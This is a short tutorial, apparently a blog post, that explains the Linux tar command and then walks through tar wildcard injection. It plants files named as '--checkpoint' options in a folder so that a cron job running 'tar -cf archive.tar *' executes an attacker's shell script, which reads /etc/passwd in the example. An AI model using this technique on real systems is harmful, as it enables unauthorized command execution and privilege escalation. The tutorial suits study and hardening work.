What is ‘tar’ command in linux?
The tar (tape archive) command is a frequently used command on linux that allows you to store files into an archive. This command is available by default on most linux systems and you do not need to install it separately.
Backup files with ‘tar’:
It can be found in many systems that the below command is executed in cronjob which takes a backup of all the files:
tar -cf archive.tar *
The above command creates an archive named “archive.tar” which stores all the files in the current location from where the command is executed.
Below screenshot shows test1 and test2 files gets archived when the above command is executed:
‘tar’ command has two options that can be exploited:
Displays progress after every <NUMBER> record.
execute ACTION on each checkpoint
Exploiting ‘tar wildcard command:
We will create two blank files (using ‘touch’ command) but with certain parameters:
touch — “–checkpoint=1”
touch — “–checkpoint-action=exec=sh shell.sh”
shell.sh is a simple file with .sh extension.
Below contents are present in the shell.sh file:
cat /etc/passwd (this can be changed to any other command depending on requirement)
We have completed all the steps for running the exploit. It’s time to execute the exploit:
Run the below command again
Tar -cf archive.tar *
Voila !!! Our own command got executed.